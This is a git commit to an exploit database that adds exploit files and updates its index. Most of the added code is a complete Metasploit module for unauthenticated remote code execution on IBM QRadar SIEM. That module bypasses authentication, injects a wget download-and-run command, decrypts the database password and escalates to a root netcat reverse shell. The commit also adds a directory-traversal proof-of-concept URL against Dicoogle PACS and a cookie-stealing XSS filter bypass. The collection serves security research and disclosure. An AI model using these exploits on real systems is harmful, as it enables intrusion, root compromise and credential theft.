DB: 2018-07-12
5 changes to exploits/shellcodes Nibbleblog - Arbitrary File Upload (Metasploit) Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit) Nibbleblog - Multiple SQL Injections Nibbleblog 3 - Multiple SQL Injections Instagram-Clone Script 2.0 - Cross-Site Scripting Dicoogle PACS 2.5.0 - Directory Traversal
This commit is contained in:
parent
02fa7c70d3
commit
52954b4751
6 changed files with 290 additions and 4 deletions
|
@ -6,7 +6,7 @@
|
||||||
|
|
||||||
- @kr105rlz
|
- @kr105rlz
|
||||||
|
|
||||||
Download: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44206.zip
|
Download: http://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44206.zip
|
||||||
*/
|
*/
|
||||||
|
|
||||||
#include "ps4.h"
|
#include "ps4.h"
|
||||||
|
|
|
@ -13,4 +13,4 @@ $ make
|
||||||
# Reference
|
# Reference
|
||||||
[Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)](https://blogs.bromium.com/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/)
|
[Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)](https://blogs.bromium.com/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/)
|
||||||
|
|
||||||
Download: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44205.zip
|
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44205.zip
|
19
exploits/linux/webapps/45007.txt
Normal file
19
exploits/linux/webapps/45007.txt
Normal file
|
@ -0,0 +1,19 @@
|
||||||
|
# Exploit Title: Dicoogle PACS 2.5.0 - Directory Traversal
|
||||||
|
# Date: 2018-05-25
|
||||||
|
# Software Link: http://www.dicoogle.com/home
|
||||||
|
# Version: Dicoogle PACS 2.5.0-20171229_1522
|
||||||
|
# Category: webapps
|
||||||
|
# Tested on: Windows 2012 R2
|
||||||
|
# Exploit Author: Carlos Avila
|
||||||
|
# Contact: http://twitter.com/badboy_nt
|
||||||
|
|
||||||
|
# 1. Description
|
||||||
|
# Dicoogle is an open source medical imaging repository with an extensible
|
||||||
|
# indexing system and distributed mechanisms. In version 2.5.0, it is vulnerable
|
||||||
|
# to local file inclusion. This allows an attacker to read arbitrary files that the
|
||||||
|
# web user has access to. Admin credentials aren't required. The ‘UID’ parameter
|
||||||
|
# via GET is vulnerable.
|
||||||
|
|
||||||
|
# 2. Proof of Concept
|
||||||
|
|
||||||
|
http://Target:8080/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
|
36
exploits/php/webapps/45003.txt
Normal file
36
exploits/php/webapps/45003.txt
Normal file
|
@ -0,0 +1,36 @@
|
||||||
|
# Exploit Title: Instagram-clone Script 2.0 - Cross-Site Scripting
|
||||||
|
# Date: 2018-07-10
|
||||||
|
# Exploit Author: L0RD
|
||||||
|
# Vendor Homepage: https://github.com/yTakkar/Instagram-clone
|
||||||
|
# Version: 2.0
|
||||||
|
# CVE: CVE-2018-13849
|
||||||
|
# Tested on: Kali linux
|
||||||
|
|
||||||
|
# POC : Persistent Cross site scripting :
|
||||||
|
# vulnerable file : edit_requests.php
|
||||||
|
# vulnerable code :
|
||||||
|
|
||||||
|
if (isset($_POST['username'])) {
|
||||||
|
$username = preg_replace("#[<> ]#i", "", $_POST['username']);
|
||||||
|
$firstname = preg_replace("#[<> ]#i", "", $_POST['firstname']);
|
||||||
|
$surname = preg_replace("#[<> ]#i", "", $_POST['surname']);
|
||||||
|
$bio = preg_replace("#[<>]#i", "", $_POST['bio']);
|
||||||
|
$instagram = preg_replace("#[<>]#i", "", $_POST['instagram']);
|
||||||
|
$youtube = preg_replace("#[<>]#i", "", $_POST['youtube']);
|
||||||
|
$facebook = preg_replace("#[<>]#i", "", $_POST['facebook']);
|
||||||
|
$twitter = preg_replace("#[<>]#i", "", $_POST['twitter']);
|
||||||
|
$website = preg_replace("#[<>]#i", "", $_POST['website']);
|
||||||
|
$mobile = preg_replace("#[^0-9]#i", "", $_POST['mobile']);
|
||||||
|
$tags = preg_replace("#[\s]#", "-", $_POST['tags']);
|
||||||
|
$session = $_SESSION['id'];
|
||||||
|
|
||||||
|
$m=$edit->saveProfileEditing($username, $firstname, $surname, $bio,
|
||||||
|
$instagram, $youtube, $facebook, $twitter, $website, $mobile, $tags);
|
||||||
|
$array = array("mssg" => $m);
|
||||||
|
echo json_encode($array);
|
||||||
|
}
|
||||||
|
|
||||||
|
# We use this payload to bypass filter :
|
||||||
|
# Payload :
|
||||||
|
|
||||||
|
"onmouseover=" alert(document.cookie)
|
228
exploits/unix/remote/45005.rb
Executable file
228
exploits/unix/remote/45005.rb
Executable file
|
@ -0,0 +1,228 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'securerandom'
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Exploit::Remote::HttpServer
|
||||||
|
include Msf::Exploit::EXE
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'IBM QRadar SIEM Unauthenticated Remote Code Execution',
|
||||||
|
'Description' => %q{
|
||||||
|
IBM QRadar SIEM has three vulnerabilities in the Forensics web application
|
||||||
|
that when chained together allow an attacker to achieve unauthenticated remote code execution.
|
||||||
|
|
||||||
|
The first stage bypasses authentication by fixating session cookies.
|
||||||
|
The second stage uses those authenticated sessions cookies to write a file to disk and execute
|
||||||
|
that file as the "nobody" user.
|
||||||
|
The third and final stage occurs when the file executed as "nobody" writes an entry into the
|
||||||
|
database that causes QRadar to execute a shell script controlled by the attacker as root within
|
||||||
|
the next minute.
|
||||||
|
Details about these vulnerabilities can be found in the advisories listed in References.
|
||||||
|
|
||||||
|
The Forensics web application is disabled in QRadar Community Edition, but the code still works,
|
||||||
|
so these vulnerabilities can be exploited in all flavours of QRadar.
|
||||||
|
This module was tested with IBM QRadar CE 7.3.0 and 7.3.1. IBM has confirmed versions up to 7.2.8
|
||||||
|
patch 12 and 7.3.1 patch 3 are vulnerable.
|
||||||
|
Due to payload constraints, this module only runs a generic/shell_reverse_tcp payload.
|
||||||
|
},
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
|
||||||
|
],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => ['unix'],
|
||||||
|
'Arch' => ARCH_CMD,
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['CVE', '2016-9722'],
|
||||||
|
['CVE', '2018-1418'],
|
||||||
|
['CVE', '2018-1612'],
|
||||||
|
['URL', 'https://blogs.securiteam.com/index.php/archives/3689'],
|
||||||
|
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/ibm-qradar-siem-forensics.txt'],
|
||||||
|
['URL', 'http://seclists.org/fulldisclosure/2018/May/54'],
|
||||||
|
['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg22015797']
|
||||||
|
],
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
[ 'IBM QRadar SIEM <= 7.3.1 Patch 2 / 7.2.8 Patch 11', {} ],
|
||||||
|
],
|
||||||
|
'Payload' => {
|
||||||
|
'Compat' => {
|
||||||
|
'ConnectionType' => 'reverse',
|
||||||
|
}
|
||||||
|
},
|
||||||
|
'DefaultOptions' => {
|
||||||
|
'SSL' => true,
|
||||||
|
# we can only run shell scripts, so set a reverse netcat payload by default
|
||||||
|
# the payload that will be run is in the first few lines of @payload
|
||||||
|
'PAYLOAD' => 'generic/shell_reverse_tcp',
|
||||||
|
},
|
||||||
|
'DisclosureDate' => 'May 28 2018',
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
Opt::RPORT(443),
|
||||||
|
OptString.new('SRVHOST', [true, 'HTTP server address', '0.0.0.0']),
|
||||||
|
OptString.new('SRVPORT', [true, 'HTTP server port', '4448']),
|
||||||
|
])
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => '/ForensicsAnalysisServlet/',
|
||||||
|
'method' => 'GET'
|
||||||
|
})
|
||||||
|
|
||||||
|
if res.nil?
|
||||||
|
vprint_error 'Connection failed'
|
||||||
|
return CheckCode::Unknown
|
||||||
|
end
|
||||||
|
|
||||||
|
if res.code == 403
|
||||||
|
return CheckCode::Detected
|
||||||
|
end
|
||||||
|
|
||||||
|
CheckCode::Safe
|
||||||
|
rescue ::Rex::ConnectionError
|
||||||
|
vprint_error 'Connection failed'
|
||||||
|
return CheckCode::Unknown
|
||||||
|
end
|
||||||
|
|
||||||
|
# Handle incoming requests from QRadar
|
||||||
|
def on_request_uri(cli, request)
|
||||||
|
print_good("#{peer} - Sending privilege escalation payload to QRadar...")
|
||||||
|
print_good("#{peer} - Sit back and relax, Shelly will come visit soon!")
|
||||||
|
send_response(cli, @payload)
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
|
# step 1 of the exploit, bypass authentication in the ForensicAnalysisServlet
|
||||||
|
def set_cookies
|
||||||
|
@sec_cookie = SecureRandom.uuid
|
||||||
|
@csrf_cookie = SecureRandom.uuid
|
||||||
|
|
||||||
|
post_data = "#{rand_text_alpha(5..12)},#{rand_text_alpha(5..12)}," +
|
||||||
|
"#{@sec_cookie},#{@csrf_cookie}"
|
||||||
|
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => '/ForensicsAnalysisServlet/',
|
||||||
|
'method' => 'POST',
|
||||||
|
'ctype' => 'application/json',
|
||||||
|
'cookie' => "SEC=#{@sec_cookie}; QRadarCSRF=#{@csrf_cookie};",
|
||||||
|
'vars_get' =>
|
||||||
|
{
|
||||||
|
'action' => 'setSecurityTokens',
|
||||||
|
'forensicsManagedHostIps' => "#{rand(256)}.#{rand(256)}.#{rand(256)}.#{rand(256)}"
|
||||||
|
},
|
||||||
|
'data' => post_data
|
||||||
|
})
|
||||||
|
|
||||||
|
if res.nil? or res.code != 200
|
||||||
|
fail_with(Failure::Unknown, "#{peer} - Failed to set the SEC and QRadar CSRF cookies")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
print_status("#{peer} - Attempting to exploit #{target.name}")
|
||||||
|
|
||||||
|
# run step 1
|
||||||
|
set_cookies
|
||||||
|
|
||||||
|
# let's prepare step 2 (payload) and 3 (payload exec as root)
|
||||||
|
@payload_name = rand_text_alpha_lower(3..5)
|
||||||
|
root_payload = rand_text_alpha_lower(3..5)
|
||||||
|
|
||||||
|
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
|
||||||
|
srv_host = Rex::Socket.source_address(rhost)
|
||||||
|
else
|
||||||
|
srv_host = datastore['SRVHOST']
|
||||||
|
end
|
||||||
|
|
||||||
|
http_service = (datastore['SSL'] ? 'https://' : 'http://') + srv_host + ':' + datastore['SRVPORT'].to_s
|
||||||
|
service_uri = http_service + '/' + @payload_name
|
||||||
|
|
||||||
|
print_status("#{peer} - Starting up our web service on #{http_service} ...")
|
||||||
|
start_service({'Uri' => {
|
||||||
|
'Proc' => Proc.new { |cli, req|
|
||||||
|
on_request_uri(cli, req)
|
||||||
|
},
|
||||||
|
'Path' => "/#{@payload_name}"
|
||||||
|
}})
|
||||||
|
|
||||||
|
@payload = %{#!/bin/bash
|
||||||
|
|
||||||
|
# our payload that's going to be downloaded from our web server
|
||||||
|
cat <<EOF > /store/configservices/staging/updates/#{root_payload}
|
||||||
|
#!/bin/bash
|
||||||
|
/usr/bin/nc -e /bin/sh #{datastore['LHOST']} #{datastore['LPORT']} &
|
||||||
|
EOF
|
||||||
|
|
||||||
|
### below is adapted from /opt/qradar/support/changePasswd.sh
|
||||||
|
[ -z $NVA_CONF ] && NVA_CONF="/opt/qradar/conf/nva.conf"
|
||||||
|
NVACONF=`grep "^NVACONF=" $NVA_CONF 2> /dev/null | cut -d= -f2`
|
||||||
|
FRAMEWORKS_PROPERTIES_FILE="frameworks.properties"
|
||||||
|
FORENSICS_USER_FILE="config_user.xml"
|
||||||
|
FORENSICS_USER_FILE_CONFIG="$NVACONF/$FORENSICS_USER_FILE"
|
||||||
|
|
||||||
|
# get the encrypted db password from the config
|
||||||
|
PASSWORDENCRYPTED=`cat $FORENSICS_USER_FILE_CONFIG | grep WEBUSER_DB_PASSWORD | grep -o -P '(?<=>)([\\w\\=\\+\\/]*)(?=<)'`
|
||||||
|
|
||||||
|
QVERSION=$(/opt/qradar/bin/myver | awk -F. '{print $1$2$3}')
|
||||||
|
|
||||||
|
AU_CRYPT=/opt/qradar/lib/Q1/auCrypto.pm
|
||||||
|
P_ENC=$(grep I_P_ENC ${AU_CRYPT} | cut -d= -f2-)
|
||||||
|
P_DEC=$(grep I_P_DEC ${AU_CRYPT} | cut -d= -f2-)
|
||||||
|
|
||||||
|
AESKEY=`grep 'aes.key=' $NVACONF/$FRAMEWORKS_PROPERTIES_FILE | cut -c9-`
|
||||||
|
|
||||||
|
#if 7.2.8 or greater, use new method for hashing and salting passwords
|
||||||
|
if [[ $QVERSION -gt 727 || -z "$AESKEY" ]]
|
||||||
|
then
|
||||||
|
PASSWORD=$(perl <(echo ${P_DEC} | base64 -d) <(echo ${PASSWORDENCRYPTED}))
|
||||||
|
[ $? != 0 ] && echo "ERROR: Unable to decrypt $PASSWORDENCRYPTED" && exit 255
|
||||||
|
else
|
||||||
|
|
||||||
|
PASSWORD=`/opt/qradar/bin/runjava.sh -Daes.key=$AESKEY com.q1labs.frameworks.crypto.AESUtil decrypt $PASSWORDENCRYPTED`
|
||||||
|
[ $? != 0 ] && echo "ERROR: Unable to decrypt $PASSWORDENCRYPTED" && exit 255
|
||||||
|
fi
|
||||||
|
|
||||||
|
PGPASSWORD=$PASSWORD /usr/bin/psql -h localhost -U qradar qradar -c \
|
||||||
|
"insert into autoupdate_patch values ('#{root_payload}',#{rand(1000)+100},'minor',false,#{rand(9999)+100},0,'',1,false,'','','',false)"
|
||||||
|
|
||||||
|
# kill ourselves!
|
||||||
|
(sleep 2 && rm -- "$0") &
|
||||||
|
}
|
||||||
|
|
||||||
|
# let's do step 2 then, ask QRadar to download and execute our payload
|
||||||
|
print_status("#{peer} - Asking QRadar to download and execute #{service_uri}")
|
||||||
|
|
||||||
|
exec_cmd = "$(mkdir -p /store/configservices/staging/updates && wget --no-check-certificate -O " +
|
||||||
|
"/store/configservices/staging/updates/#{@payload_name} #{service_uri} && " +
|
||||||
|
"/bin/bash /store/configservices/staging/updates/#{@payload_name})"
|
||||||
|
|
||||||
|
payload_step2 = "pcap[0][pcap]" +
|
||||||
|
"=/#{rand_text_alpha_lower(2..6) + '/' + rand_text_alpha_lower(2..6)}" +
|
||||||
|
"&pcap[1][pcap]=#{Rex::Text::uri_encode(exec_cmd, 'hex-all')}"
|
||||||
|
|
||||||
|
uri_step2 = "/ForensicsAnalysisServlet/?forensicsManagedHostIps" +
|
||||||
|
"=127.0.0.1/forensics/file.php%3f%26&action=get&slavefile=true"
|
||||||
|
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => uri_step2 + '&' + payload_step2,
|
||||||
|
'method' => 'GET',
|
||||||
|
'cookie' => "SEC=#{@sec_cookie}; QRadarCSRF=#{@csrf_cookie};",
|
||||||
|
})
|
||||||
|
|
||||||
|
# now we just sit back and wait for step 2 payload to be downloaded and executed
|
||||||
|
# ... and then step 3 to complete. Let's give it a little more than a minute.
|
||||||
|
Rex.sleep 80
|
||||||
|
end
|
||||||
|
end
|
|
@ -15940,7 +15940,7 @@ id,file,description,date,author,type,platform,port
|
||||||
38453,exploits/hardware/remote/38453.txt,"ZHONE < S3.0.501 - Multiple Vulnerabilities",2015-10-13,"Lyon Yang",remote,hardware,
|
38453,exploits/hardware/remote/38453.txt,"ZHONE < S3.0.501 - Multiple Vulnerabilities",2015-10-13,"Lyon Yang",remote,hardware,
|
||||||
38464,exploits/hardware/remote/38464.txt,"Cisco Linksys EA2700 Router - Multiple Vulnerabilities",2013-04-15,"Phil Purviance",remote,hardware,
|
38464,exploits/hardware/remote/38464.txt,"Cisco Linksys EA2700 Router - Multiple Vulnerabilities",2013-04-15,"Phil Purviance",remote,hardware,
|
||||||
38481,exploits/hardware/remote/38481.html,"D-Link DIR-865L - Cross-Site Request Forgery",2013-04-19,"Jacob Holcomb",remote,hardware,
|
38481,exploits/hardware/remote/38481.html,"D-Link DIR-865L - Cross-Site Request Forgery",2013-04-19,"Jacob Holcomb",remote,hardware,
|
||||||
38489,exploits/php/remote/38489.rb,"Nibbleblog - Arbitrary File Upload (Metasploit)",2015-10-19,Metasploit,remote,php,
|
38489,exploits/php/remote/38489.rb,"Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)",2015-10-19,Metasploit,remote,php,
|
||||||
38492,exploits/hardware/remote/38492.html,"TP-Link TL-WR1043N Router - Cross-Site Request Forgery",2013-04-24,"Jacob Holcomb",remote,hardware,
|
38492,exploits/hardware/remote/38492.html,"TP-Link TL-WR1043N Router - Cross-Site Request Forgery",2013-04-24,"Jacob Holcomb",remote,hardware,
|
||||||
38495,exploits/hardware/remote/38495.html,"Belkin F5D8236-4 Router - Cross-Site Request Forgery",2013-04-25,"Jacob Holcomb",remote,hardware,
|
38495,exploits/hardware/remote/38495.html,"Belkin F5D8236-4 Router - Cross-Site Request Forgery",2013-04-25,"Jacob Holcomb",remote,hardware,
|
||||||
38500,exploits/windows/remote/38500.php,"HTML Compiler - Remote Code Execution",2015-10-20,"Ehsan Noreddini",remote,windows,
|
38500,exploits/windows/remote/38500.php,"HTML Compiler - Remote Code Execution",2015-10-20,"Ehsan Noreddini",remote,windows,
|
||||||
|
@ -16607,6 +16607,7 @@ id,file,description,date,author,type,platform,port
|
||||||
44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php,
|
44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php,
|
||||||
45000,exploits/linux_x86-64/remote/45000.c,"OpenSSH < 6.6 SFTP (x64) - Command Execution",2014-10-08,"Jann Horn",remote,linux_x86-64,
|
45000,exploits/linux_x86-64/remote/45000.c,"OpenSSH < 6.6 SFTP (x64) - Command Execution",2014-10-08,"Jann Horn",remote,linux_x86-64,
|
||||||
45001,exploits/linux/remote/45001.py,"OpenSSH < 6.6 SFTP - Command Execution",2018-03-20,SECFORCE,remote,linux,
|
45001,exploits/linux/remote/45001.py,"OpenSSH < 6.6 SFTP - Command Execution",2018-03-20,SECFORCE,remote,linux,
|
||||||
|
45005,exploits/unix/remote/45005.rb,"IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit)",2018-07-11,Metasploit,remote,unix,443
|
||||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||||
|
@ -35166,7 +35167,7 @@ id,file,description,date,author,type,platform,port
|
||||||
35861,exploits/php/webapps/35861.txt,"vBTube 1.2.9 - 'vBTube.php' Multiple Cross-Site Scripting Vulnerabilities",2011-06-14,Mr.ThieF,webapps,php,
|
35861,exploits/php/webapps/35861.txt,"vBTube 1.2.9 - 'vBTube.php' Multiple Cross-Site Scripting Vulnerabilities",2011-06-14,Mr.ThieF,webapps,php,
|
||||||
35862,exploits/php/webapps/35862.txt,"miniblog 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-15,"High-Tech Bridge SA",webapps,php,
|
35862,exploits/php/webapps/35862.txt,"miniblog 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-15,"High-Tech Bridge SA",webapps,php,
|
||||||
35863,exploits/php/webapps/35863.php,"MyBloggie 2.1.6 - HTML Injection / SQL Injection",2011-06-15,"Robin Verton",webapps,php,
|
35863,exploits/php/webapps/35863.php,"MyBloggie 2.1.6 - HTML Injection / SQL Injection",2011-06-15,"Robin Verton",webapps,php,
|
||||||
35865,exploits/php/webapps/35865.txt,"Nibbleblog - Multiple SQL Injections",2011-06-19,KedAns-Dz,webapps,php,
|
35865,exploits/php/webapps/35865.txt,"Nibbleblog 3 - Multiple SQL Injections",2011-06-19,KedAns-Dz,webapps,php,
|
||||||
35866,exploits/php/webapps/35866.txt,"Immophp 1.1.1 - Cross-Site Scripting / SQL Injection",2011-06-18,KedAns-Dz,webapps,php,
|
35866,exploits/php/webapps/35866.txt,"Immophp 1.1.1 - Cross-Site Scripting / SQL Injection",2011-06-18,KedAns-Dz,webapps,php,
|
||||||
35867,exploits/php/webapps/35867.txt,"Taha Portal 3.2 - 'sitemap.php' Cross-Site Scripting",2011-06-18,Bl4ck.Viper,webapps,php,
|
35867,exploits/php/webapps/35867.txt,"Taha Portal 3.2 - 'sitemap.php' Cross-Site Scripting",2011-06-18,Bl4ck.Viper,webapps,php,
|
||||||
35871,exploits/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 - 'SMExt' Cross-Site Scripting",2011-06-21,"Gjoko Krstic",webapps,php,
|
35871,exploits/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 - 'SMExt' Cross-Site Scripting",2011-06-21,"Gjoko Krstic",webapps,php,
|
||||||
|
@ -39642,3 +39643,5 @@ id,file,description,date,author,type,platform,port
|
||||||
44998,exploits/multiple/webapps/44998.py,"Oracle WebLogic 12.1.2.0 - RMI Registry UnicastRef Object Java Deserialization Remote Code Execution",2018-07-07,bobsecq,webapps,multiple,
|
44998,exploits/multiple/webapps/44998.py,"Oracle WebLogic 12.1.2.0 - RMI Registry UnicastRef Object Java Deserialization Remote Code Execution",2018-07-07,bobsecq,webapps,multiple,
|
||||||
44999,exploits/linux/webapps/44999.txt,"Elektronischer Leitz-Ordner 10 - SQL Injection",2018-07-10,"Jens Regel",webapps,linux,
|
44999,exploits/linux/webapps/44999.txt,"Elektronischer Leitz-Ordner 10 - SQL Injection",2018-07-10,"Jens Regel",webapps,linux,
|
||||||
45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware,
|
45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware,
|
||||||
|
45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php,
|
||||||
|
45007,exploits/linux/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,linux,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue